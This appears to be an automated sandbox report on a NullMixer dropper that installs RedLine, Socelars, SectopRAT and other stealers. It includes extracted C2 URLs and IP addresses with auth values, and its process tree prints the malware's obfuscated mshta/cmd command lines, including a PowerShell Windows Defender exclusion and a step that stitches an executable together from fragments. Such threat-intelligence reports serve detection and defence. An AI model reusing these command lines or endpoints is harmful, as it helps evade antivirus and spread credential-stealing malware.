Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08-11-2024 01:58
Static task
static1
Behavioral task
behavioral1
Sample
91c43b63ed3549c521e4166ab7358e29ce19f8087c9053a8c6b6e4f17ddeb4c5.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
91c43b63ed3549c521e4166ab7358e29ce19f8087c9053a8c6b6e4f17ddeb4c5.exe
Resource
win10v2004-20241007-en
General
-
Target
setup_installer.exe
-
Size
3.8MB
-
MD5
b968dfca2c74f26c008abffa22c74581
-
SHA1
160dc676ce1696daa20f3c2d56cf41d84481d628
-
SHA256
582bd655f491fe76a95b9c8900a3051d379dcbb86036f273b2a7bc6cdd928e9b
-
SHA512
8146433494d3150b8a0c47783bfe004a8f6503eb71ffc87c508b76342a864f10f9913918a9e0828cfd83634d054868f129e06e4eb3c989c88b1e6c15e1262881
-
SSDEEP
98304:xuCvLUBsgNljaa5vDFVkA2jYsVn3QWQjC78LF4EZCm:xnLUCgjaaDj2xFQhjCSHZCm
Malware Config
Extracted
nullmixer
http://hsiens.xyz/
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.znsjis.top/
Extracted
redline
she
135.181.129.119:4805
-
auth_value
b69102cdbd4afe2d3159f88fb6dac731
Extracted
redline
ANI
45.142.215.47:27643
-
auth_value
9491a1c5e11eb6097e68a4fa8627fda8
Extracted
gcleaner
ggg-cl.biz
45.9.20.13
Signatures
-
Detect Fabookie payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun12d1c7c93af0.exe family_fabookie -
Fabookie family
-
Gcleaner family
-
Nullmixer family
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Onlylogger family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
Processes:
resource yara_rule behavioral3/memory/1960-150-0x00000000017A0000-0x00000000017C4000-memory.dmp family_redline behavioral3/memory/1960-151-0x00000000017F0000-0x0000000001812000-memory.dmp family_redline behavioral3/memory/2164-167-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2164-175-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2164-173-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2164-172-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2164-169-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 7 IoCs
Processes:
resource yara_rule behavioral3/memory/1960-150-0x00000000017A0000-0x00000000017C4000-memory.dmp family_sectoprat behavioral3/memory/1960-151-0x00000000017F0000-0x0000000001812000-memory.dmp family_sectoprat behavioral3/memory/2164-167-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral3/memory/2164-175-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral3/memory/2164-173-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral3/memory/2164-172-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral3/memory/2164-169-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat -
Sectoprat family
-
Socelars family
-
Socelars payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun125ca7899a38c4.exe family_socelars -
OnlyLogger payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/1808-209-0x0000000000400000-0x00000000016E0000-memory.dmp family_onlylogger behavioral3/memory/1808-214-0x0000000000400000-0x00000000016E0000-memory.dmp family_onlylogger -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exeflow pid process 73 1860 rundll32.exe 83 1860 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\7zS869E7076\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS869E7076\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS869E7076\libcurlpp.dll aspack_v212_v242 -
Executes dropped EXE 14 IoCs
Processes:
setup_install.exeSun1215e751f01d.exeSun12d744062a.exeSun12b075b343272c8.exeSun125d119c415ff55f3.exeSun12e078fe45525.exeSun12d1c7c93af0.exeSun120cc0aa73f536.exeSun125ca7899a38c4.exeSun1254899501f5870.exeSun12d97c5e312382.exeSun12bbb32b76.exe09xU.exESun12e078fe45525.exepid process 2600 setup_install.exe 1284 Sun1215e751f01d.exe 1252 Sun12d744062a.exe 1444 Sun12b075b343272c8.exe 1808 Sun125d119c415ff55f3.exe 2000 Sun12e078fe45525.exe 2248 Sun12d1c7c93af0.exe 2024 Sun120cc0aa73f536.exe 2292 Sun125ca7899a38c4.exe 2284 Sun1254899501f5870.exe 620 Sun12d97c5e312382.exe 1960 Sun12bbb32b76.exe 1744 09xU.exE 2164 Sun12e078fe45525.exe -
Loads dropped DLL 61 IoCs
Processes:
setup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeSun1215e751f01d.execmd.execmd.exeSun12b075b343272c8.execmd.exeSun125d119c415ff55f3.exeSun12e078fe45525.exeSun120cc0aa73f536.exeSun125ca7899a38c4.exeSun12d97c5e312382.exeSun12bbb32b76.exeWerFault.execmd.exe09xU.exErundll32.exeWerFault.exeSun12e078fe45525.exerundll32.exepid process 2408 setup_installer.exe 2408 setup_installer.exe 2408 setup_installer.exe 2600 setup_install.exe 2600 setup_install.exe 2600 setup_install.exe 2600 setup_install.exe 2600 setup_install.exe 2600 setup_install.exe 2600 setup_install.exe 2600 setup_install.exe 584 cmd.exe 2016 cmd.exe 1976 cmd.exe 1988 cmd.exe 1988 cmd.exe 2008 cmd.exe 1700 cmd.exe 1844 cmd.exe 2008 cmd.exe 2256 cmd.exe 2256 cmd.exe 1284 Sun1215e751f01d.exe 1284 Sun1215e751f01d.exe 1188 cmd.exe 1804 cmd.exe 1444 Sun12b075b343272c8.exe 1444 Sun12b075b343272c8.exe 1716 cmd.exe 1716 cmd.exe 1808 Sun125d119c415ff55f3.exe 1808 Sun125d119c415ff55f3.exe 2000 Sun12e078fe45525.exe 2000 Sun12e078fe45525.exe 2024 Sun120cc0aa73f536.exe 2024 Sun120cc0aa73f536.exe 2292 Sun125ca7899a38c4.exe 2292 Sun125ca7899a38c4.exe 620 Sun12d97c5e312382.exe 620 Sun12d97c5e312382.exe 1960 Sun12bbb32b76.exe 1960 Sun12bbb32b76.exe 3000 WerFault.exe 3000 WerFault.exe 1612 cmd.exe 1744 09xU.exE 1744 09xU.exE 2000 Sun12e078fe45525.exe 3000 WerFault.exe 2756 rundll32.exe 2756 rundll32.exe 2756 rundll32.exe 2616 WerFault.exe 2616 WerFault.exe 2616 WerFault.exe 2616 WerFault.exe 2164 Sun12e078fe45525.exe 2164 Sun12e078fe45525.exe 1860 rundll32.exe 1860 rundll32.exe 1860 rundll32.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 57 pastebin.com 58 pastebin.com 18 iplogger.org 21 iplogger.org 41 iplogger.org 42 iplogger.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Sun12e078fe45525.exedescription pid process target process PID 2000 set thread context of 2164 2000 Sun12e078fe45525.exe Sun12e078fe45525.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 3000 620 WerFault.exe Sun12d97c5e312382.exe 2616 2600 WerFault.exe setup_install.exe -
System Location Discovery: System Language Discovery 1 TTPs 39 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Sun12d97c5e312382.exepowershell.execmd.exetaskkill.execmd.exeSun12e078fe45525.exemshta.exerundll32.exeSun1215e751f01d.execmd.execmd.exeSun12e078fe45525.exeSun125d119c415ff55f3.execmd.execmd.execmd.exemshta.execmd.exesetup_installer.exesetup_install.exeSun125ca7899a38c4.exemshta.execmd.execmd.execmd.execmd.execmd.exeSun12b075b343272c8.exeSun120cc0aa73f536.exeSun12bbb32b76.execmd.execmd.execmd.execmd.exerundll32.exe09xU.exEtaskkill.execmd.execontrol.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sun12d97c5e312382.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sun12e078fe45525.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sun1215e751f01d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sun12e078fe45525.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sun125d119c415ff55f3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sun125ca7899a38c4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sun12b075b343272c8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sun120cc0aa73f536.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sun12bbb32b76.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 09xU.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language control.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 912 taskkill.exe 2828 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2252 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Sun125d119c415ff55f3.exepid process 1808 Sun125d119c415ff55f3.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
Sun125ca7899a38c4.exepowershell.exeSun1254899501f5870.exeSun12d744062a.exetaskkill.exetaskkill.exedescription pid process Token: SeCreateTokenPrivilege 2292 Sun125ca7899a38c4.exe Token: SeAssignPrimaryTokenPrivilege 2292 Sun125ca7899a38c4.exe Token: SeLockMemoryPrivilege 2292 Sun125ca7899a38c4.exe Token: SeIncreaseQuotaPrivilege 2292 Sun125ca7899a38c4.exe Token: SeMachineAccountPrivilege 2292 Sun125ca7899a38c4.exe Token: SeTcbPrivilege 2292 Sun125ca7899a38c4.exe Token: SeSecurityPrivilege 2292 Sun125ca7899a38c4.exe Token: SeTakeOwnershipPrivilege 2292 Sun125ca7899a38c4.exe Token: SeLoadDriverPrivilege 2292 Sun125ca7899a38c4.exe Token: SeSystemProfilePrivilege 2292 Sun125ca7899a38c4.exe Token: SeSystemtimePrivilege 2292 Sun125ca7899a38c4.exe Token: SeProfSingleProcessPrivilege 2292 Sun125ca7899a38c4.exe Token: SeIncBasePriorityPrivilege 2292 Sun125ca7899a38c4.exe Token: SeCreatePagefilePrivilege 2292 Sun125ca7899a38c4.exe Token: SeCreatePermanentPrivilege 2292 Sun125ca7899a38c4.exe Token: SeBackupPrivilege 2292 Sun125ca7899a38c4.exe Token: SeRestorePrivilege 2292 Sun125ca7899a38c4.exe Token: SeShutdownPrivilege 2292 Sun125ca7899a38c4.exe Token: SeDebugPrivilege 2292 Sun125ca7899a38c4.exe Token: SeAuditPrivilege 2292 Sun125ca7899a38c4.exe Token: SeSystemEnvironmentPrivilege 2292 Sun125ca7899a38c4.exe Token: SeChangeNotifyPrivilege 2292 Sun125ca7899a38c4.exe Token: SeRemoteShutdownPrivilege 2292 Sun125ca7899a38c4.exe Token: SeUndockPrivilege 2292 Sun125ca7899a38c4.exe Token: SeSyncAgentPrivilege 2292 Sun125ca7899a38c4.exe Token: SeEnableDelegationPrivilege 2292 Sun125ca7899a38c4.exe Token: SeManageVolumePrivilege 2292 Sun125ca7899a38c4.exe Token: SeImpersonatePrivilege 2292 Sun125ca7899a38c4.exe Token: SeCreateGlobalPrivilege 2292 Sun125ca7899a38c4.exe Token: 31 2292 Sun125ca7899a38c4.exe Token: 32 2292 Sun125ca7899a38c4.exe Token: 33 2292 Sun125ca7899a38c4.exe Token: 34 2292 Sun125ca7899a38c4.exe Token: 35 2292 Sun125ca7899a38c4.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 2284 Sun1254899501f5870.exe Token: SeDebugPrivilege 1252 Sun12d744062a.exe Token: SeDebugPrivilege 912 taskkill.exe Token: SeDebugPrivilege 2828 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_installer.exesetup_install.execmd.exedescription pid process target process PID 2408 wrote to memory of 2600 2408 setup_installer.exe setup_install.exe PID 2408 wrote to memory of 2600 2408 setup_installer.exe setup_install.exe PID 2408 wrote to memory of 2600 2408 setup_installer.exe setup_install.exe PID 2408 wrote to memory of 2600 2408 setup_installer.exe setup_install.exe PID 2408 wrote to memory of 2600 2408 setup_installer.exe setup_install.exe PID 2408 wrote to memory of 2600 2408 setup_installer.exe setup_install.exe PID 2408 wrote to memory of 2600 2408 setup_installer.exe setup_install.exe PID 2600 wrote to memory of 1476 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1476 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1476 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1476 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1476 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1476 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1476 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 584 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 584 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 584 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 584 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 584 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 584 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 584 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1844 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1844 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1844 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1844 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1844 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1844 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1844 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2016 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2016 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2016 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2016 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2016 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2016 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2016 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2256 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2256 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2256 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2256 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2256 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2256 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2256 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2008 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2008 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2008 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2008 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2008 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2008 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 2008 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1988 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1988 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1988 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1988 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1988 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1988 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1988 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1976 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1976 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1976 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1976 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1976 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1976 2600 setup_install.exe cmd.exe PID 2600 wrote to memory of 1976 2600 setup_install.exe cmd.exe PID 584 wrote to memory of 1284 584 cmd.exe Sun1215e751f01d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS869E7076\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- System Location Discovery: System Language Discovery
PID:1476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1215e751f01d.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun1215e751f01d.exeSun1215e751f01d.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1284 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun1215e751f01d.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun1215e751f01d.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )5⤵
- System Location Discovery: System Language Discovery
PID:2360 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun1215e751f01d.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun1215e751f01d.exe") do taskkill /F -Im "%~NxU"6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1612 -
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1744 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )8⤵
- System Location Discovery: System Language Discovery
PID:1640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"9⤵
- System Location Discovery: System Language Discovery
PID:3016
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )8⤵
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I9⤵
- System Location Discovery: System Language Discovery
PID:2064 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "10⤵
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"10⤵
- System Location Discovery: System Language Discovery
PID:400
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I10⤵
- System Location Discovery: System Language Discovery
PID:2056 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I11⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2756 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵PID:2372
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I13⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1860
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Sun1215e751f01d.exe"7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12d1c7c93af0.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1844 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun12d1c7c93af0.exeSun12d1c7c93af0.exe4⤵
- Executes dropped EXE
PID:2248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12d744062a.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun12d744062a.exeSun12d744062a.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12d97c5e312382.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2256 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun12d97c5e312382.exeSun12d97c5e312382.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:620 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 620 -s 2725⤵
- Loads dropped DLL
- Program crash
PID:3000
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun125d119c415ff55f3.exe /mixone3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun125d119c415ff55f3.exeSun125d119c415ff55f3.exe /mixone4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12e078fe45525.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun12e078fe45525.exeSun12e078fe45525.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun12e078fe45525.exeC:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun12e078fe45525.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2164
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12b075b343272c8.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun12b075b343272c8.exeSun12b075b343272c8.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun125ca7899a38c4.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\7zS869E7076\Sun125ca7899a38c4.exeSun125ca7899a38c4.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2292 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- System Location Discovery: System Language Discovery
PID:2660 -
